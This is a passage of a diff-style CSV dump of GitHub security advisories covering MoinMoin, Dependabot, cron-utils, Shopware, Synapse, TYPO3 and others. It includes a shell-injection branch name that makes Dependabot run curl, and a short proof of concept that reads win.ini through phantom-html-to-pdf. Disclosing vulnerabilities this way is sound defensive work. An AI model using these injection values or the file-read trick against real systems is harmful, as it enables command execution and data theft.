+* Open an issue in [simonw/datasette-indieauth](https://github.com/simonw/datasette-indieauth/issues)",[],"[{'package': {'ecosystem': 'PyPI', 'name': 'datasette-indieauth'}, 'ecosystem_specific': {'affected_functions': ['datasette_indieauth.indieauth_page', 'datasette_indieauth.indieauth_done']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.0'}, {'fixed': '1.1'}]}], 'versions': ['1.0']}]","[{'type': 'WEB', 'url': 'https://github.com/simonw/datasette-indieauth/security/advisories/GHSA-mjcr-rqjg-rhg3'}, {'type': 'WEB', 'url': 'https://github.com/simonw/datasette-indieauth/commit/376c8804c6b0811852049229a24336fe5eb6a439'}, {'type': 'PACKAGE', 'url': 'https://github.com/simonw/datasette-indieauth'}, {'type': 'WEB', 'url': 'https://pypi.org/project/datasette-indieauth/'}]","{'cwe_ids': ['CWE-290'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-11-24T21:20:38Z', 'nvd_published_at': None}"
+1.4.0,GHSA-q76j-58cx-wp5v,2020-11-13T17:28:31Z,2020-11-13T17:28:49Z,,[],Vulnerability in RPKI manifest validation,"
+A vulnerability in RPKI manifest validation exists when objects on the manifest are hidden, or expired objects are replayed. An attacker successfully exploiting this vulnerability could prevent new ROAs from being received or selectively hide ROAs, causing routes to become INVALID.
+
+To exploit this vulnerability, an attacker would need to perform a man in the middle attack on the TLS connection between the validator and an RRDP repository or perform a man in the middle attack against a rsync-only repository.
+
+The update addresses the vulnerability by implementing validation methods from [RFC 6486bis](https://datatracker.ietf.org/doc/draft-ietf-sidrops-6486bis/00/) and enabling strict validation by default.",[],"[{'package': {'ecosystem': 'Maven', 'name': 'net.ripe.rpki:rpki-validator-3'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.2-2020.10.28.23.06'}]}], 'database_specific': {'last_known_affected_version_range': '<= 3.2-2020.10.28.22.25'}}]","[{'type': 'WEB', 'url': 'https://github.com/RIPE-NCC/rpki-validator-3/security/advisories/GHSA-q76j-58cx-wp5v'}]","{'cwe_ids': ['CWE-20'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-11-13T17:28:31Z', 'nvd_published_at': None}"
+1.4.0,GHSA-52q8-877j-gghq,2020-11-11T15:51:56Z,2020-11-11T15:54:51Z,,['CVE-2020-25074'],remote code execution via cache action in MoinMoin,"### Impact
+The cache action in action/cache.py allows directory traversal through a crafted HTTP request. An attacker who can upload attachments to
+the wiki can use this to achieve remote code execution.
+
+### Patches
+Users are strongly advised to upgrade to a patched version.
+
+MoinMoin Wiki 1.9.11 has the necessary fixes and also contains other important fixes.
+
+### Workarounds
+It is not advised to work around this, but to upgrade MoinMoin to a patched version.
+
+That said, a work around via disabling the `cache` or the `AttachFile` action might be possible.
+
+Also, it is of course helpful if you give `write` permissions (which include uploading attachments) only to trusted users.
+
+### Credits
+
+This vulnerability was discovered by Michael Chapman.
+
+### For more information
+If you have any questions or comments about this advisory, email me at [twaldmann@thinkmo.de](mailto:twaldmann@thinkmo.de).",[],"[{'package': {'ecosystem': 'PyPI', 'name': 'moin'}, 'ecosystem_specific': {'affected_functions': ['moin.action.cache.execute']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.9.11'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/moinwiki/moin-1.9/security/advisories/GHSA-52q8-877j-gghq'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-25074'}, {'type': 'WEB', 'url': 'https://github.com/moinwiki/moin-1.9/commit/6b96a9060069302996b5af47fd4a388fc80172b7'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2020/11/msg00020.html'}, {'type': 'WEB', 'url': 'https://pypi.org/project/moin/'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2020/dsa-4787'}, {'type': 'WEB', 'url': 'http://moinmo.in/SecurityFixes'}]","{'cwe_ids': ['CWE-22'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-11-11T15:51:56Z', 'nvd_published_at': None}"
+1.4.0,GHSA-23f7-99jx-m54r,2023-05-16T16:04:56Z,2020-11-13T15:47:50Z,,['CVE-2020-26222'],Remote code execution in dependabot-core branch names when cloning,"### Impact
+Remote code execution vulnerability in `dependabot-common` and `dependabot-go_modules` when a source branch name contains malicious injectable bash code.
+
+For example, if Dependabot is configured to use the following source branch name: `""/$({curl,127.0.0.1})""`, Dependabot will make a HTTP request to the following URL: 127.0.0.1 when cloning the source repository.
+
+When Dependabot is configured to clone the source repository during an update, Dependabot runs a shell command to git clone the repository:
+
+```bash
+git clone --no-tags --no-recurse-submodules --depth=1 --branch= --single-branch repo/contents/path
+```
+
+Dependabot will always clone the source repository for `go_modules` during the file fetching step and can be configured to clone the repository for other package managers using the `FileFetcher` class from `dependabot-common`.
+
+```ruby
+source = Dependabot::Source.new(
+ provider: ""github"",
+ repo: ""repo/name"",
+ directory: ""/"",
+ branch: ""/$({curl,127.0.0.1})"",
+)
+
+repo_contents_path = ""./file/path""
+fetcher = Dependabot::FileFetchers.for_package_manager(""bundler"").
+ new(source: source, credentials: [],
+ repo_contents_path: repo_contents_path)
+fetcher.clone_repo_contents
+```
+
+### Patches
+
+The fix was applied to version `0.125.1`: https://github.com/dependabot/dependabot-core/pull/2727
+
+### Workarounds
+Escape the branch name prior to passing it to the `Dependabot::Source` class.
+
+For example using `shellwords`:
+
+```ruby
+require ""shellwords""
+branch = Shellwords.escape(""/$({curl,127.0.0.1})"")
+source = Dependabot::Source.new(
+ provider: ""github"",
+ repo: ""repo/name"",
+ directory: ""/"",
+ branch: branch,
+)
+```","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'RubyGems', 'name': 'dependabot-omnibus'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.119.0.beta1'}, {'fixed': '0.125.1'}]}]}, {'package': {'ecosystem': 'RubyGems', 'name': 'dependabot-common'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.119.0.beta1'}, {'fixed': '0.125.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/dependabot/dependabot-core/security/advisories/GHSA-23f7-99jx-m54r'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-26222'}, {'type': 'WEB', 'url': 'https://github.com/dependabot/dependabot-core/pull/2727'}, {'type': 'WEB', 'url': 'https://github.com/dependabot/dependabot-core/commit/e089116abbe284425b976f7920e502b8e83a61b5'}, {'type': 'PACKAGE', 'url': 'https://github.com/dependabot/dependabot-core'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/dependabot-common/CVE-2020-26222.yml'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/dependabot-omnibus/CVE-2020-26222.yml'}, {'type': 'WEB', 'url': 'https://rubygems.org/gems/dependabot-common'}, {'type': 'WEB', 'url': 'https://rubygems.org/gems/dependabot-omnibus'}]","{'cwe_ids': ['CWE-74'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-11-13T15:47:18Z', 'nvd_published_at': None}"
+1.4.0,GHSA-pfj3-56hm-jwq5,2021-01-07T22:39:49Z,2020-11-24T23:48:38Z,,['CVE-2020-26238'],Template injection in cron-utils,"### Impact
+A Template Injection was identified in cron-utils enabling attackers to inject arbitrary Java EL expressions, leading to unauthenticated Remote Code Execution (RCE) vulnerability. Versions up to 9.1.2 are susceptible to this vulnerability. Please note, that only projects using the @Cron annotation to validate untrusted Cron expressions are affected.
+
+### Patches
+The issue was patched and a new version released. Please upgrade to version 9.1.3.
+
+### Workarounds
+There are no known workarounds up to this moment.
+
+### References
+A description of the issue is provided in [issue 461](https://github.com/jmrozanec/cron-utils/issues/461)
+
+### For more information
+If you have any questions or comments about this advisory:
+* Open an issue in [cron-utils Github repository](https://github.com/jmrozanec/cron-utils)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.cronutils:cron-utils'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '9.1.3'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/jmrozanec/cron-utils/security/advisories/GHSA-pfj3-56hm-jwq5'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-26238'}, {'type': 'WEB', 'url': 'https://github.com/jmrozanec/cron-utils/issues/461'}, {'type': 'WEB', 'url': 'https://github.com/jmrozanec/cron-utils/commit/4cf373f7352f5d95f0bf6512af8af326b31c835e'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r390bb7630b7ea8f02bf7adbbe69c0ae8b562c527d663c543d965f959@%3Cgitbox.hive.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r432a69a1a85cbcb1f1bad2aa0fbfce0367bf894bf917f6ed7118e7f0@%3Cissues.hive.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r50e1b5544c37e408ed7e9a958b28237b1cb9660ba2b3dba46f343e23@%3Cissues.hive.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r5f601d15292e3302ad0ae0e89527029546945b1cd5837af7e838d354@%3Cdev.hive.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r71083c759dc627f198571b3d48b6745fe798b1d53c34f7ef8de9e7dd@%3Cissues.hive.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r737406bc17d49ffe8fe6a8828d390ee0a02e45e5a5b4f931180b9a93@%3Cissues.hive.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r855aead591697dc2e85faf66c99036e49f492431940b78d4e6d895b5@%3Cgitbox.hive.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r96937fc9c82f3201b59311c067e97bce71123944f93102169a95bf5c@%3Cissues.hive.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r9ae9a9fb1c8e2bf95c676e7e4cd06aa04f0a3a8a9ec1a6b787afb00f@%3Cissues.hive.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/ra9e81244d323898dde3c979dd7df6996e4037d14a01b6629ea443548@%3Cissues.hive.apache.org%3E'}]","{'cwe_ids': ['CWE-74'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-11-24T23:48:26Z', 'nvd_published_at': '2020-11-25T00:15:00Z'}"
+1.4.0,GHSA-85rr-4rh9-hhwh,2021-01-07T22:39:39Z,2020-11-25T16:53:27Z,,['CVE-2020-26243'],Memory leak in Nanopb,"### Impact
+Decoding specifically formed message can leak memory if dynamic allocation is enabled and an oneof field contains a static submessage that contains a dynamic field, and the message being decoded contains the submessage multiple times. This is rare in normal messages, but it is a concern when untrusted data is parsed.
+
+### Patches
+Preliminary patch is [available on git](https://github.com/nanopb/nanopb/commit/edf6dcbffee4d614ac0c2c1b258ab95185bdb6e9) and problem will be patched in versions 0.3.9.7 and 0.4.4 once testing has been completed.
+
+### Workarounds
+Following workarounds are available:
+* Set the option `no_unions` for the oneof field. This will generate fields as separate instead of C union, and avoids triggering the problematic code.
+* Set the type of the submessage field inside oneof to `FT_POINTER`. This way the whole submessage will be dynamically allocated and the problematic code is not executed.
+* Use an arena allocator for nanopb, to make sure all memory can be released afterwards.
+
+### References
+Bug report: https://github.com/nanopb/nanopb/issues/615
+
+### For more information
+If you have any questions or comments about this advisory, comment on the bug report linked above.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'nanopb'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.3.2'}, {'fixed': '0.3.9.7'}]}], 'database_specific': {'last_known_affected_version_range': '<= 0.3.9.6'}}, {'package': {'ecosystem': 'PyPI', 'name': 'nanopb'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.4.0'}, {'fixed': '0.4.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/nanopb/nanopb/security/advisories/GHSA-85rr-4rh9-hhwh'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-26243'}, {'type': 'WEB', 'url': 'https://github.com/nanopb/nanopb/issues/615'}, {'type': 'WEB', 'url': 'https://github.com/nanopb/nanopb/commit/4fe23595732b6f1254cfc11a9b8d6da900b55b0c'}, {'type': 'WEB', 'url': 'https://github.com/nanopb/nanopb/blob/2b48a361786dfb1f63d229840217a93aae064667/CHANGELOG.txt'}]","{'cwe_ids': ['CWE-119', 'CWE-20'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-11-25T16:52:43Z', 'nvd_published_at': None}"
+1.4.0,GHSA-74hv-qjjq-h7g5,2020-11-24T21:42:40Z,2020-11-24T22:59:08Z,,[],datasette-graphql leaks details of the schema of private database files,"### Impact
+
+When running against a Datasette instance with private databases, `datasette-graphql` would expose the schema of those database tables - but not the table contents.
+
+### Patches
+
+Patched in version 1.2.
+
+### Workarounds
+
+This issue is only present if a Datasette instance that includes private databases and has the `datasette-graphql` plugin installed is available on the public internet. Uninstalling the `datasette-graphql` plugin or preventing public access to the instance can workaround this issue.
+
+### For more information
+If you have any questions or comments about this advisory:
+* Open an issue in [datasette-graphql](https://github.com/simonw/datasette-graphql)
+* Contact [@simonw](https://twitter.com/simonw) by Twitter direct message",[],"[{'package': {'ecosystem': 'PyPI', 'name': 'datasette-graphql'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/simonw/datasette-graphql/security/advisories/GHSA-74hv-qjjq-h7g5'}, {'type': 'WEB', 'url': 'https://pypi.org/project/datasette-graphql/'}]","{'cwe_ids': ['CWE-200'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2020-11-24T21:42:40Z', 'nvd_published_at': None}"
+1.4.0,GHSA-8jq6-w5cg-wm45,2020-11-11T21:38:07Z,2020-11-11T21:38:18Z,,[],Exploitable inventory component chaining in PocketMine-MP,"### Impact
+Specially crafted `InventoryTransactionPacket`s sent by malicious clients were able to exploit the behaviour of `InventoryTransaction->findResultItem()` and cause it to take an abnormally long time to execute (causing an apparent server freeze).
+
+The affected code is intended to compact conflicting `InventoryActions` which are in the same `InventoryTransaction` by flattening them into a single action. When multiple pathways to a result existed, the complexity of this flattening became exponential.
+
+The problem was fixed by bailing when ambiguities are detected.
+
+**At the time of writing, this exploit is being used in the wild by attackers to deny service to servers.**
+
+### Patches
+Upgrade to 3.15.4 or newer.
+
+### Workarounds
+No practical workarounds are possible, short of backporting the fix or implementing checks in a plugin listening to `DataPacketReceiveEvent`.
+
+### References
+c368ebb5e74632bc622534b37cd1447b97281e20
+
+### For more information
+If you have any questions or comments about this advisory:
+* Email us at [team@pmmp.io](mailto:team@pmmp.io)",[],"[{'package': {'ecosystem': 'Packagist', 'name': 'pocketmine/pocketmine-mp'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.15.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/pmmp/PocketMine-MP/security/advisories/GHSA-8jq6-w5cg-wm45'}]","{'cwe_ids': ['CWE-400'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-11-11T21:38:07Z', 'nvd_published_at': None}"
+1.4.0,GHSA-4q96-6xhq-ff43,2022-10-19T15:37:02Z,2020-11-11T15:54:41Z,,['CVE-2020-15275'],malicious SVG attachment causing stored XSS vulnerability,"### Impact
+An attacker with `write` permissions can upload an SVG file that contains malicious javascript. This javascript will be executed in a user's browser when the user is viewing that SVG file on the wiki.
+
+### Patches
+Users are strongly advised to upgrade to a patched version.
+
+MoinMoin Wiki 1.9.11 has the necessary fixes and also contains other important fixes.
+
+### Workarounds
+It is not advised to work around this, but to upgrade MoinMoin to a patched version.
+
+That said, a work around via a Content Security Policy in the web server might be possible.
+
+Also, it is of course helpful if you give `write` permissions (which include uploading attachments) only to trusted users.
+
+### For more information
+If you have any questions or comments about this advisory, email me at [twaldmann@thinkmo.de](mailto:twaldmann@thinkmo.de).
+
+### Credits
+
+This vulnerability was discovered by:
+
+Catarina Leite from the Checkmarx SCA AppSec team","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'moin'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.9.11'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/moinwiki/moin-1.9/security/advisories/GHSA-4q96-6xhq-ff43'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-15275'}, {'type': 'WEB', 'url': 'https://github.com/moinwiki/moin-1.9/commit/31de9139d0aabc171e94032168399b4a0b2a88a2'}, {'type': 'WEB', 'url': 'https://advisory.checkmarx.net/advisory/CX-2020-4285'}, {'type': 'PACKAGE', 'url': 'https://github.com/moinwiki/moin-1.9'}, {'type': 'WEB', 'url': 'https://github.com/moinwiki/moin-1.9/releases/tag/1.9.11'}, {'type': 'WEB', 'url': 'https://pypi.org/project/moin/'}]","{'cwe_ids': ['CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-11-11T15:49:35Z', 'nvd_published_at': '2020-11-11T16:15:00Z'}"
+1.4.0,GHSA-4v2w-h9jm-mqjg,2021-01-07T22:40:03Z,2020-11-27T16:07:15Z,,['CVE-2020-26245'],Prototype Pollution in systeminformation,"### Impact
+command injection vulnerability by prototype pollution
+
+### Patches
+Problem was fixed with a rewrite of shell sanitations to avoid prototyper pollution problems. Please upgrade to version >= 4.30.2
+
+### Workarounds
+If you cannot upgrade, be sure to check or sanitize service parameter strings that are passed to si.inetChecksite()
+
+### For more information
+If you have any questions or comments about this advisory:
+
+* Open an issue in [systeminformation](https://github.com/sebhildebrandt/systeminformation/issues/new?template=bug_report.md)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:L/A:L'}]","[{'package': {'ecosystem': 'npm', 'name': 'systeminformation'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.30.5'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/sebhildebrandt/systeminformation/security/advisories/GHSA-4v2w-h9jm-mqjg'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-26245'}, {'type': 'WEB', 'url': 'https://github.com/sebhildebrandt/systeminformation/commit/8113ff0e87b2f422a5756c48f1057575e73af016'}]","{'cwe_ids': ['CWE-471', 'CWE-78'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-11-27T15:56:36Z', 'nvd_published_at': None}"
+1.4.0,GHSA-6h7f-qwqm-35pp,2023-09-07T22:36:42Z,2020-11-06T18:06:16Z,,['CVE-2020-7763'],Arbitrary File Read in phantom-html-to-pdf,"This affects the package phantom-html-to-pdf before 0.6.1.
+
+### PoC
+```js
+var fs = require('fs') var conversion = require(""phantom-html-to-pdf"")();
+conversion.allowLocalFilesAccess = false conversion({
+ html: ""document.write(window.location='c:/windows/win.ini')""
+}, function(err, pdf) {
+ var output = fs.createWriteStream('output.pdf') console.log(pdf.logs);
+ console.log(pdf.numberOfPages);
+ pdf.stream.pipe(output);
+});
+```","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'phantom-html-to-pdf'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.6.2'}]}], 'database_specific': {'last_known_affected_version_range': '< 0.6.1'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7763'}, {'type': 'WEB', 'url': 'https://github.com/pofider/phantom-html-to-pdf/commit/b5d2da2639a49a95e0bdb3bc0c987cb6406b8259'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-PHANTOMHTMLTOPDF-1023598'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/phantom-html-to-pdf'}]","{'cwe_ids': ['CWE-200', 'CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-11-06T18:02:24Z', 'nvd_published_at': '2020-11-05T14:15:00Z'}"
+1.4.0,GHSA-6gv9-7q4g-pmvm,2020-11-13T01:17:58Z,2020-11-13T15:47:36Z,,[],Persistent XSS in customer module in Shopware,"### Impact
+Persistent XSS in customer module
+
+### Patches
+
+We recommend updating to the current version 5.6.9. You can get the update to 5.6.9 regularly via the Auto-Updater or directly via the download overview.
+
+For older versions you can use the Security Plugin:
+https://store.shopware.com/en/swag575294366635f/shopware-security-plugin.html
+
+### References
+https://docs.shopware.com/en/shopware-5-en/security-updates/security-update-11-2020",[],"[{'package': {'ecosystem': 'Packagist', 'name': 'shopware/shopware'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.6.9'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/shopware/shopware/security/advisories/GHSA-6gv9-7q4g-pmvm'}, {'type': 'WEB', 'url': 'https://docs.shopware.com/en/shopware-5-en/security-updates/security-update-11-2020'}]","{'cwe_ids': ['CWE-79'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2020-11-13T01:17:58Z', 'nvd_published_at': None}"
+1.4.0,GHSA-fx3v-553x-3c4q,2021-03-04T18:24:54Z,2020-11-23T19:47:59Z,,['CVE-2020-15249'],Stored XSS by authenticated backend user with access to upload files,"### Impact
+Backend users with access to upload files were permitted to upload SVG files without any sanitization applied to the uploaded files. Since SVG files support being parsed as HTML by browsers, this means that they could theoretically upload Javascript that would be executed on a path under the website's domain (i.e. /storage/app/media/evil.svg), but they would have to convince their target to visit that location directly in the target's browser as the backend does not display SVGs inline anywhere, SVGs are only displayed as image resources in the backend and are thus unable to be executed.
+
+### Patches
+Issue has been patched in Build 469 (v1.0.469) & v1.1.0.
+
+### Workarounds
+Apply https://github.com/octobercms/library/commit/80aab47f044a2660aa352450f55137598f362aa4 to your installation manually if unable to upgrade to Build 469 or v1.1.0.
+
+### References
+Reported by [Hoan Hoang](https://github.com/hoanhp)
+
+### For more information
+If you have any questions or comments about this advisory:
+* Email us at [hello@octobercms.com](mailto:hello@octobercms.com)
+
+### Threat assessment:
+ ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'october/backend'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.0.319'}, {'fixed': '1.0.469'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/octobercms/october/security/advisories/GHSA-fx3v-553x-3c4q'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-15249'}, {'type': 'WEB', 'url': 'https://github.com/octobercms/library/commit/80aab47f044a2660aa352450f55137598f362aa4'}]","{'cwe_ids': ['CWE-79'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2020-11-23T19:47:07Z', 'nvd_published_at': None}"
+1.4.0,GHSA-j977-g5vj-j27g,2021-01-07T22:49:01Z,2020-11-09T14:21:17Z,,['CVE-2020-7750'],Cross-Site Scripting in scratch-svg-renderer,"This affects the package scratch-svg-renderer before 0.2.0-prerelease.20201019174008. The loadString function does not escape SVG properly, which can be used to inject arbitrary elements into the DOM via the _transformMeasurements function.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'scratch-svg-renderer'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.2.0-prerelease.20201019174008'}]}], 'database_specific': {'last_known_affected_version_range': '<= 0.2.0-prerelease.20201016121710'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7750'}, {'type': 'WEB', 'url': 'https://github.com/LLK/scratch-svg-renderer/commit/9ebf57588aa596c4fa3bb64209e10ade395aee90'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-SCRATCHSVGRENDERER-1020497'}]","{'cwe_ids': ['CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-11-09T14:09:20Z', 'nvd_published_at': None}"
+1.4.0,GHSA-4mp3-385r-v63f,2020-11-24T21:47:35Z,2020-11-24T22:58:58Z,,['CVE-2020-26890'],Denial of service attack due to invalid JSON,"### Impact
+A denial of service attack against Matrix clients can be exploited by sending an event including invalid JSON data to Synapse. Synapse would relay the data to clients which could crash or hang. Impact is long-lasting if the event is made part of the room state.
+
+### Patches
+At a minimum #8106 and #8291 must be applied. #7372 and #8124 include additional checks.
+
+### Workarounds
+There are no known workarounds.
+
+### Upgrading notes
+If an invalid event is accepted by an earlier Synapse it can become part of the room state and will not be fixed by upgrading Synapse. Redacting the invalid event should avoid clients receiving the invalid event.",[],"[{'package': {'ecosystem': 'PyPI', 'name': 'matrix-synapse'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.20.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/matrix-org/synapse/security/advisories/GHSA-4mp3-385r-v63f'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-26890'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/G7YXMMYQP46PYL664JQUXCA3LPBJU7DQ/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U34DPP4ZLOEDUY2ZCWOHQPU5GA5LYNUQ/'}, {'type': 'WEB', 'url': 'https://pypi.org/project/matrix-synapse/'}]","{'cwe_ids': ['CWE-20'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-11-24T21:47:35Z', 'nvd_published_at': '2020-11-24T03:15:00Z'}"
+1.4.0,GHSA-hrfh-fp4x-crrq,2020-11-13T18:00:57Z,2020-11-13T18:26:06Z,,[],Persistent XSS in newsletter module in Shopware,"### Impact
+Persistent XSS in newsletter module
+
+### Patches
+
+We recommend updating to the current version 5.6.9. You can get the update to 5.6.9 regularly via the Auto-Updater or directly via the download overview.
+
+For older versions you can use the Security Plugin:
+https://store.shopware.com/en/swag575294366635f/shopware-security-plugin.html
+
+### References
+https://docs.shopware.com/en/shopware-5-en/security-updates/security-update-11-2020",[],"[{'package': {'ecosystem': 'Packagist', 'name': 'shopware/shopware'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.6.9'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/shopware/shopware/security/advisories/GHSA-hrfh-fp4x-crrq'}, {'type': 'WEB', 'url': 'https://docs.shopware.com/en/shopware-5-en/security-updates/security-update-11-2020'}]","{'cwe_ids': ['CWE-79'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2020-11-13T18:00:57Z', 'nvd_published_at': None}"
+1.4.0,GHSA-q9cp-mc96-m4w2,2021-01-07T22:39:29Z,2020-11-23T21:18:44Z,,['CVE-2020-26229'],XML External Entity in Dashboard Widget,"### Problem
+It has been discovered that RSS widgets are susceptible to XML external entity processing.
+This vulnerability is reasonable, but is theoretical - it was not possible to actually reproduce the vulnerability with current PHP versions of supported and maintained system distributions.
+
+At least with _libxml2_ version 2.9, the processing of XML external entities is disabled per default - and cannot be exploited. Besides that, a valid backend user account is needed.
+
+### Solution
+Update to TYPO3 version 10.4.10 that fixes the problem described.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:L/I:N/A:L'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'typo3/cms-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '10.4.0'}, {'fixed': '10.4.10'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/TYPO3/TYPO3.CMS/security/advisories/GHSA-q9cp-mc96-m4w2'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-26229'}, {'type': 'WEB', 'url': 'https://typo3.org/security/advisory/typo3-core-sa-2020-012'}]","{'cwe_ids': ['CWE-611'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2020-11-23T21:16:32Z', 'nvd_published_at': None}"
+1.4.0,GHSA-gvqv-779r-4jgp,2020-11-27T20:06:27Z,2020-11-27T20:13:05Z,,['CVE-2020-16017'],Use after free in CefSharp,"CVE-2020-16017: Use after free in site isolation
+
